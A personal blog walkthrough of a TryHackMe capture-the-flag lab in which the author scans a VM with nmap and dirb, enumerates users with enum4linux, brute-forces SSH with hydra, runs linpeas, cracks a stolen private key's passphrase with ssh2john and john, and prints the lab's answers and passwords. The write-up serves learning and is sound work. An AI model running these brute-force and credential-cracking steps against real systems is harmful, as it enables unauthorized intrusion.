After my success in a previous try hack me room, I decided to have a go at another one. This time it was a bit more difficult, and I have to admit, I needed to check the video at some stages to get some guidance. Never the less, here is how I managed to complete the room.
The room was designed to give the user experience with the following tools and techniques:
- brute forcing
- hash cracking
- service enumeration
- Linux Enumeration
I didn't have much experience with hash cracking or brute forcing, so this was a good room for me to learn a bit about that. I was familiar with the name of one of the tools I ended up using but hadn't used it in over a decade.
The list of challenges/questions for this room were as follows:
- Find the services exposed by the vulnerable machine
- What is the name of the hidden directory on the web server?
- Use brute-forcing to find the username and password
- What is the username?
- What is the password?
- What service do you use to access the server?
- Enumerate the machine to find any vectors for privilege escalation
- What is the name of the other user you found?
- If you have found another user, what can you do with this information?
- What is the final password you obtain?
Find the Services
The first thing I did was open up nmap and do a port scan on the server, asking it to retrieve the services and their versions, if possible.
──(gareth㉿SRF239-L)-[/usr/lib/win-kex/pulse] └─$ nmap -sV 10.10.112.215 Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-20 01:08 CET Nmap scan report for 10.10.112.215 Host is up (0.042s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) 8080/tcp open http Apache Tomcat 9.0.7 Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Then I went to the website hosted on port 80 and was greeted with the following under construction page.
Although there was nothing to see here, because of the question I knew there was a hidden directory hosted on this server, so it was time to use dirbuster to scan for any hidden directories.
Find the Hidden Directory
┌──(gareth㉿SRF239-L)-[/usr/lib/win-kex/pulse] └─$ dirb http://10.10.112.215 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sun Dec 20 01:12:05 2020 URL_BASE: http://10.10.112.215/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.112.215/ ---- ==> DIRECTORY: http://10.10.112.215/development/ + http://10.10.112.215/index.html (CODE:200|SIZE:158) + http://10.10.112.215/server-status (CODE:403|SIZE:301) ---- Entering directory: http://10.10.112.215/development/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Sun Dec 20 01:15:13 2020 DOWNLOADED: 4612 - FOUND: 2
Scanning the directory with dirbuster I was able to determine that the name of the hidden directory was in fact: development.
In this directory, there were 2 text files. The contents of which were as follows:
2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat to host that on this server too. Haven't made any real web apps yet, but I have tried that example you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm using version 2.5.12, because other versions were giving me trouble. -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J
I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials, and I was able to crack your hash really easily. You know our password policy, so please follow it? Change that password ASAP.
This lead me off on a bit of a tangent, searching for vulnerabilities for Struts version 2.5.12 and the tomcat server which was running on port 8080. This ultimately ended up fruitless.
Finding the Usernames
Earlier on in one of the AdventOfCyber2 challenges, I was introduced to a script which could enumerate a Linux server and return a wealth of information about it. I decided to try and run that script against the server instead. This script is called enum4linux and comes preinstalled with Kali-Linux.
The results of running this against the server revealed a lot of information, but perhaps the most important was the usernames of the J and K users. A snippet from this script showed me the following:
┌──(gareth㉿SRF239-L)-[/usr/lib/win-kex/pulse] └─$ enum4linux -a 10.10.81.129 ... [+] Enumerating users using SID S-1-22-1 and logon username '', password '' S-1-22-1-1000 Unix User\kay (Local User) S-1-22-1-1001 Unix User\jan (Local User) ...
So now I have the answers for questions 3,4,5 and 8. But how to get the password for the user, and which user to try and crack? Well, from the message that Kay so kindly left for Jan in the hidden development folder, we know that Jan has a weak password that should be easy to crack, so I decided to try that next.
Cracking the Password
From the port scan earlier I know that an SSH server is running on port 22, so I try and brute-force the ssh login. I used a tool called hydra to do this. I gave hydra the known username, "jan", and a list of passwords. Hydra will try all the passwords in the list and show me whenever there's a successful match.
┌──(gareth㉿SRF239-L)-[/usr/lib/win-kex/pulse] └─$ hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.81.129 ssh -f Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-20 23:13:04 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking ssh://10.10.81.129:22/ [STATUS] 181.00 tries/min, 181 tries in 00:01h, 14344223 to do in 1320:50h, 16 active STATUS] 130.67 tries/min, 392 tries in 00:03h, 14344009 to do in 1829:36h, 16 active [ERROR] Can not create restore file (./hydra.restore) - Permission denied [ssh] host: 10.10.81.129 login: jan password: armando [STATUS] attack finished for 10.10.81.129 (valid pair found)
So the answer to question 5, the password, is
Login with SSH
Perfect, now I have the password for the Jan user. I can use this to login via ssh.
┌──(gareth㉿SRF239-L)-[/usr/lib/win-kex/pulse] └─$ ssh email@example.com firstname.lastname@example.org's password: Last login: Sun Dec 20 17:33:33 2020 from 10.8.145.210 jan@basic2:~$
Enumerating the Linux Server
So now that I have SSH access to the server, it's time to run an enumeration script locally on the machine, to see if there are any avenues I can exploit. I used a script called LinPeas.sh that I found on GitHub. LinPeas gives a lovely colourful output of the various things it has found, with colour coding for severity, so it is easy to know what to try and exploit first.
┌──(gareth㉿SRF239-L)-[~/Desktop/Tools] └─$ scp linpeas.sh email@example.com:/tmp/linpeas.sh firstname.lastname@example.org's password: linpeas.sh jan@basic2:~$ cd /tmp jan@basic2:/tmp$ ls hsperfdata_tomcat9 linpeas.sh systemd-private-57d6d8ce909b4ab5881fd8dfb036a4b1-systemd-timesyncd.service-9s6Nq1 jan@basic2:/tmp$ chmod +x linpeas.sh jan@basic2:/tmp$ ./linpeas.sh
This script produced a lot of output. The most interesting however was the availability of an ssh file for the other user on the system (kay).
[+] Searching ssl/ssh files /home/kay/.ssh/authorized_keys /home/kay/.ssh/id_rsa /home/kay/.ssh/id_rsa.pub Port 22 PermitRootLogin prohibit-password PubkeyAuthentication yes PermitEmptyPasswords no ChallengeResponseAuthentication no UsePAM yes Possible private SSH keys were found! /home/kay/.ssh/id_rsa
Let's see if I can access this file, and if so, if I can use it to login as the Kay user.
Remarkably the file was readable by the Jan user, so I now have the private key. I copied it to my local machine (using scp) and tried to login as kay.
Cracking the SSH Key Password
So it looks like I need to try and crack this ssh file's password. I can use a tool called John to try and do this. To be able to use John though, I need to convert this ssh file into a format it understands. Thankfully there's a script that comes with Kali-Linux called
ssh2john.py which will do just that.
Once I have the file in the format John understands, it's time to crack the password. For this cracking attempt, as with the previous one we'll be using a very large and famous wordlist called rockyou.txt.
┌──(gareth㉿SRF239-L)-[~/.ssh] └─$ /usr/share/john/ssh2john.py kay_id_rsa > kay_id_rsa_john ┌──(gareth㉿SRF239-L)-[~/.ssh] └─$ john --wordlist=/usr/share/wordlists/rockyou.txt kay_id_rsa_john Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 8 OpenMP threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status beeswax (kay_id_rsa) Warning: Only 2 candidates left, minimum 8 needed for performance. 1g 0:00:00:07 DONE (2020-12-20 23:56) 0.1336g/s 1917Kp/s 1917Kc/s 1917KC/sa6_123..*7¡Vamos! Session completed
It worked!! I can now use the found password
beeswax to add the ssh key and login to the server as kay.
┌──(gareth㉿SRF239-L)-[~/.ssh] └─$ ssh -i kay_id_rsa email@example.com Enter passphrase for key 'kay_id_rsa': Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 0 packages can be updated. 0 updates are security updates. Last login: Mon Apr 23 16:04:07 2018 from 192.168.56.102 kay@basic2:~$
Now it's time to find the password to answer the final question for the room.
Luckily in the home directory I found a file called
pass.bak. This file contains the final password:
kay@basic2:~$ ls pass.bak kay@basic2:~$ cat pass.bak heresareallystrongpasswordthatfollowsthepasswordpolicy$$ kay@basic2:~$
This room was a lot more difficult than the previous one. There were several different tools involved and a few different potential avenues to explore.
It taught me the importance of running enumeration scripts early to see if they can help solve problems automatically, without wasting time trying to find out things for myself in a more manual way.
It also opened up my eyes to how easy it is to run brute-force attacks against systems, and how to crack files offline as well.
I really enjoyed this room and hope I can find another similar one to try without having to resort to peeking at the video to make progress.